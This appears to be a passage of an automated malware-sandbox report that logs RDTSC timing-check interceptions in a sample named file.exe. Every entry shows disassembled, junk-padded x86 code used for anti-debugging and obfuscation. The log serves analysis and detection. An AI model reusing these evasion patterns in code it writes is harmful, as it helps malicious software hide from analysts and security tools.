                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0E69 second address: 49C0EB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F05ECFAD30Ch 0x0000000b adc si, 72B8h 0x00000010 jmp 00007F05ECFAD30Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F05ECFAD30Eh 0x00000025 add ax, AD18h 0x0000002a jmp 00007F05ECFAD30Bh 0x0000002f popfd 0x00000030 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0EB5 second address: 49C0EC9 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edi 0x0000000f mov si, 37BFh 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0EC9 second address: 49C0F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD315h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F05ECFAD313h 0x00000013 adc eax, 4B1373EEh 0x00000019 jmp 00007F05ECFAD319h 0x0000001e popfd 0x0000001f mov eax, 30B71B77h 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0F20 second address: 49C0F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10024 second address: 4A1007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F05ECFAD30Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F05ECFAD310h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 jmp 00007F05ECFAD30Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F05ECFAD310h 0x00000024 sbb ch, 00000068h 0x00000027 jmp 00007F05ECFAD30Bh 0x0000002c popfd 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0098 second address: 49A009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A009C second address: 49A00A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00A2 second address: 49A00A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00A8 second address: 49A00B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00B7 second address: 49A00BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00BB second address: 49A00BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00BF second address: 49A00C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00C5 second address: 49A00CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00CB second address: 49A00CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00CF second address: 49A00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00D3 second address: 49A0103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov eax, ebx 0x0000000c mov bl, 13h 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F05ECE231C8h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0103 second address: 49A013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c jmp 00007F05ECFAD316h 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F05ECFAD30Ah 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A013C second address: 49A014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C99 second address: 49C0C9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C9D second address: 49C0CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CA3 second address: 49C0CD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05ECFAD317h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CD0 second address: 49C0CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0865 second address: 49C0877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD30Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0877 second address: 49C087B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C076C second address: 49C079D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05ECFAD317h 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F05ECFAD30Ch 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C079D second address: 49C07A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C07A3 second address: 49C07A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0488 second address: 49C048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C048C second address: 49C0492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0492 second address: 49C0498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0498 second address: 49C049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C049C second address: 49C04F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F05ECE231C0h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F05ECE231C1h 0x00000019 add esi, 1BE5CEA6h 0x0000001f jmp 00007F05ECE231C1h 0x00000024 popfd 0x00000025 mov bx, cx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C04F7 second address: 49C0500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, F448h 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0500 second address: 49C0583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 pushfd 0x00000006 jmp 00007F05ECE231C8h 0x0000000b sbb ax, 36A8h 0x00000010 jmp 00007F05ECE231BBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c mov ecx, 0661A0BBh 0x00000021 mov ax, 8D97h 0x00000025 popad 0x00000026 pop ebp 0x00000027 pushad 0x00000028 pushad 0x00000029 mov cl, AFh 0x0000002b call 00007F05ECE231BBh 0x00000030 pop esi 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushfd 0x00000035 jmp 00007F05ECE231BFh 0x0000003a xor esi, 2F02294Eh 0x00000040 jmp 00007F05ECE231C9h 0x00000045 popfd 0x00000046 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0319 second address: 49D0322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, CBC4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0322 second address: 49D0330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0330 second address: 49D0334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0334 second address: 49D034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D034F second address: 49D0354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0354 second address: 49D0390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F05ECE231C7h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F05ECE231C1h 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F5D second address: 4A00FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05ECFAD311h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F05ECFAD30Ch 0x00000017 jmp 00007F05ECFAD315h 0x0000001c popfd 0x0000001d mov di, ax 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FB5 second address: 4A00FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FB9 second address: 4A00FBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FBF second address: 4A00FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E04E9 second address: 49E04F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E04F8 second address: 49E0537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05ECE231C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F05ECE231BDh 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0537 second address: 49E053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E053D second address: 49E0541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0541 second address: 49E0571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007F05ECFAD315h 0x00000010 push esi 0x00000011 mov di, 46E2h 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov eax, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0571 second address: 49E0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0575 second address: 49E0579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0579 second address: 49E057F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E057F second address: 49E05BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d jmp 00007F05ECFAD30Eh 0x00000012 mov eax, 30A47BC1h 0x00000017 popad 0x00000018 and dword ptr [eax+04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F05ECFAD313h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E05BE second address: 49E05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E05D6 second address: 49E05DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06A6 second address: 49C06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05ECE231C0h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06D2 second address: 49C06D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C06D8 second address: 49C0705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05ECE231C7h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0011 second address: 49E0103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F05ECFAD30Ch 0x00000010 mov edi, esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 call 00007F05ECFAD30Dh 0x00000019 pop esi 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 call 00007F05ECFAD30Ah 0x00000025 mov di, si 0x00000028 pop ecx 0x00000029 pushfd 0x0000002a jmp 00007F05ECFAD317h 0x0000002f sub ecx, 06F3432Eh 0x00000035 jmp 00007F05ECFAD319h 0x0000003a popfd 0x0000003b popad 0x0000003c xchg eax, ebp 0x0000003d jmp 00007F05ECFAD30Eh 0x00000042 mov ebp, esp 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F05ECFAD30Eh 0x0000004b jmp 00007F05ECFAD315h 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007F05ECFAD310h 0x00000057 add ah, 00000038h 0x0000005a jmp 00007F05ECFAD30Bh 0x0000005f popfd 0x00000060 popad 0x00000061 pop ebp 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F05ECFAD315h 0x00000069 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E03DC second address: 49E03E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E03E2 second address: 49E03E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00701 second address: 4A0071E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C9h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0071E second address: 4A00722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00722 second address: 4A00811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F05ECE231BAh 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 mov esi, edx 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 call 00007F05ECE231C9h 0x0000001c pushfd 0x0000001d jmp 00007F05ECE231C0h 0x00000022 or ax, 8328h 0x00000027 jmp 00007F05ECE231BBh 0x0000002c popfd 0x0000002d pop eax 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007F05ECE231C2h 0x00000036 xchg eax, ecx 0x00000037 pushad 0x00000038 jmp 00007F05ECE231BEh 0x0000003d mov dx, cx 0x00000040 popad 0x00000041 push eax 0x00000042 jmp 00007F05ECE231C7h 0x00000047 xchg eax, ecx 0x00000048 jmp 00007F05ECE231C6h 0x0000004d mov eax, dword ptr [76FA65FCh] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007F05ECE231BDh 0x0000005b adc si, B4B6h 0x00000060 jmp 00007F05ECE231C1h 0x00000065 popfd 0x00000066 call 00007F05ECE231C0h 0x0000006b pop eax 0x0000006c popad 0x0000006d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00811 second address: 4A00817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00817 second address: 4A0081B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0081B second address: 4A0084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007F05ECFAD316h 0x0000000f je 00007F065F4D0431h 0x00000015 pushad 0x00000016 popad 0x00000017 mov ecx, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0084B second address: 4A0084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0084F second address: 4A0085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0085F second address: 4A00865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00990 second address: 4A00994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00994 second address: 4A009B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009B1 second address: 4A009C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD30Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009C1 second address: 4A009D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009D9 second address: 4A009DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009DD second address: 4A009E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0007 second address: 49B00F1 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F05ECFAD314h 0x0000000d sub ch, 00000078h 0x00000010 jmp 00007F05ECFAD30Bh 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F05ECFAD316h 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F05ECFAD311h 0x00000025 xor esi, 51E4FFC6h 0x0000002b jmp 00007F05ECFAD311h 0x00000030 popfd 0x00000031 mov bl, cl 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 jmp 00007F05ECFAD313h 0x0000003a mov ebp, esp 0x0000003c jmp 00007F05ECFAD316h 0x00000041 and esp, FFFFFFF8h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F05ECFAD30Dh 0x0000004d sbb al, 00000036h 0x00000050 jmp 00007F05ECFAD311h 0x00000055 popfd 0x00000056 pushfd 0x00000057 jmp 00007F05ECFAD310h 0x0000005c sbb ax, 2058h 0x00000061 jmp 00007F05ECFAD30Bh 0x00000066 popfd 0x00000067 popad 0x00000068 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B00F1 second address: 49B0130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov cl, 60h 0x0000000d mov al, bl 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F05ECE231C7h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0130 second address: 49B016C instructions: 0x00000000 rdtsc 0x00000002 mov si, 14CFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c xchg eax, ecx 0x0000000d jmp 00007F05ECFAD317h 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F05ECFAD315h 0x0000001a rdtsc
